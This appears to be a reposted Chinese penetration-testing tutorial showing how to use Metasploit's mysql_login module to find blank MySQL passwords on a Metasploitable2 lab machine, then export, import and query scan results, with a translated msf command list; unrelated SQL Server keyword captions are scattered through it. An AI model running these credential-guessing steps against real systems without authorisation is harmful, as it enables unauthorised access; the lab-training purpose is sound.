加入收藏 | 设为首页 | 会员中心 | 我要投稿 晋中站长网 (https://www.0354zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 站长学院 > MsSql教程 > 正文

网络安全、渗透测试之实战-使用msf扫描靶机上mysql服务的空密码

发布时间:2022-10-15 14:30:58 所属栏目:MsSql教程 来源:网络
导读: 1 实战-使用msf扫描靶机上mysql服务的空密码
我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180

登录Metasploitable2-Linux系统用户名root,密码:123456
输入ip a

1 实战-使用msf扫描靶机上mysql服务的空密码

我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180

mssql忘记密码_mssql数据库密码_mssql数据库密码

登录Metasploitable2-Linux系统用户名root,密码:123456

输入ip a 查看ip地址

mssql忘记密码_mssql数据库密码_mssql数据库密码

登录Kali开始搜索模块

msf6> search mysql_login

mssql数据库密码_mssql数据库密码_mssql忘记密码

加载模块

msf6 > use auxiliary/scanner/mysql/mysql_login

查看模块配置项

msf6 auxiliary(scanner/mysql/mysql_login) > show options

mssql数据库密码_mssql数据库密码_mssql忘记密码

我们配置要爆破的用户

msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root

参数:BLANK_PASSWORDS 含意:Try blank passwords for all users #为所有用户尝试空密码 。 blank [bl??k] 空白的

开启为所有用户尝试空密码

msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true

设置目标主机

msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.180

配置完成以后我们执行run 或者exploit

msf6 auxiliary(scanner/mysql/mysql_login) > exploit

执行成功

使用后端凭证命令creds , 列出数据库中的所有凭据

Credentials  [kr??den?lz] 凭证;证书;
msf6 auxiliary(scanner/mysql/mysql_login) > creds

2 将扫描的结果导出Metasploit与导入另一台机器的Metasploit中

数据库后端命令:

db_connect 连接到现有的数据库

db_disconnect 断开与当前数据库实例的连接

db_export 导出包含数据库内容的文件

db_import 导入扫描结果文件(文件类型将被自动检测)

例1:将前面扫描mysql数据库空密码信息导出

msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /root/bak.xml

注:导出只支持两种格式:xml和pwdump

常用的导出格式为 xml

导出以后退出程序

msf6 auxiliary(scanner/mysql/mysql_login) > exit

例2:将扫描的结果导入另一台机器的Metasploit中

我们就不再开一台新Kali,直接重置数据库,当成新的来用

┌──(root?xuegod53)-[~]
└─# msfdb reinit      

连接Metasploit

└─# msfconsole
msf6 > hosts

mssql数据库密码_mssql忘记密码_mssql数据库密码

数据库中主机信息是空的,我们导入数据

msf6 > db_import /root/bak.xml

mssql忘记密码_mssql数据库密码_mssql数据库密码

mssql忘记密码_mssql数据库密码_mssql数据库密码

hosts命令有多个选项,通过 hosts -h 可以查看

msf6 > hosts -h

mssql忘记密码_mssql数据库密码_mssql数据库密码

在这里mssql数据库密码,最重要的是选项 -c,此选项使我们能够选择要用hosts命令显示的数据的列或字段(类似于SQL中的select命令)。在上图中可以看到显示的可用列。

例:显示指定列的主机信息

msf6 > hosts -c address,name,os_name

mssql数据库密码_mssql数据库密码_mssql忘记密码

删除指定主机

msf6 > hosts -d 192.168.1.180

mssql数据库密码_mssql忘记密码_mssql数据库密码

除此之外我们还可以直接将NMAP的扫描结果导入到Metasploit数据库中我们新开一个终端窗口来进行扫描。

└─# nmap -A xuegod.cn -oX xuegod.xml 

-oX 将扫描信息导出到XML文件中

mssql忘记密码_mssql数据库密码_mssql数据库密码

我们回到Metasploit导入扫描结果

msf6 > db_import /root/xuegod.xml

mssql数据库密码_mssql数据库密码_mssql忘记密码

msf5 > hosts

mssql忘记密码_mssql数据库密码_mssql数据库密码

查看我们数据库中的主机都开放了哪些服务

msf5 > services

mssql忘记密码_mssql数据库密码_mssql数据库密码

显示指定主机的服务信息

msf5 > services  -R 101.200.128.35 

mssql数据库密码_mssql忘记密码_mssql数据库密码

扩展:

在msf命令提示符下输入help后,显示的命令列表和作用描述。

msf6 > help

核心命令

=============

? 帮助菜单

banner 显示一个metasploit横幅

cd 更改当前的工作目录

color 切换颜色

connect 连接与主机通信

exit 退出控制台

get 获取特定于上下文的变量的值

getg 获取全局变量的值

grep grep另一个命令的输出 如: grep creds help

help 帮助菜单

history 显示命令历史

irb 进入irb脚本模式

load 加载一个框架插件

quit 退出控制台

route 通过会话路由流量

save 保存活动的数据存储

sessions 转储会话列表并显示有关会话的信息

set 将特定于上下文的变量设置为一个值

setg 将全局变量设置为一个值

sleep 在指定的秒数内不做任何事情

spool 将控制台输出写入文件以及屏幕

threads 线程查看和操作后台线程

unload 卸载框架插件

unset 取消设置一个或多个特定于上下文的变量

unsetg 取消设置一个或多个全局变量

version 显示框架和控制台库版本号

模块命令

===============

advanced 显示一个或多个模块的高级选项

back 从当前上下文返回

edit 使用首选编辑器编辑当前模块

info 显示有关一个或多个模块的信息

loadpath 路径从路径搜索并加载模块

options 显示全局选项或一个或多个模块

popm 将最新的模块从堆栈中弹出并使其处于活动状态

previous 将之前加载的模块设置为当前模块

pushm 将活动或模块列表推入模块堆栈

reload_all 从所有定义的模块路径重新加载所有模块

search 搜索模块名称和描述

show 显示给定类型的模块或所有模块

use 按名称选择模块

工作命令

============

handler 作为作业启动负载处理程序

jobs 显示和管理作业

kill 杀死一个工作

rename_job 重命名作业

资源脚本命令

========================

makerc 保存从开始到文件输入的命令

resource 运行存储在文件中的命令

数据库后端命令

=========================

db_connect 连接到现有的数据库

db_disconnect 断开与当前数据库实例的连接

db_export 导出包含数据库内容的文件

db_import 导入扫描结果文件(文件类型将被自动检测)

db_nmap 执行nmap并自动记录输出

db_rebuild_cache 重建数据库存储的模块高速缓存

db_status 显示当前的数据库状态

hosts 列出数据库中的所有主机

loot 列出数据库中的所有战利品

notes 列出数据库中的所有笔记

services 列出数据库中的所有服务

vulns 列出数据库中的所有漏洞

workspace 在数据库工作区之间切换

凭证后端命令

============================

creds 列出数据库中的所有凭据

更多技术干货尽在公众号【学神来啦】!

(编辑:晋中站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!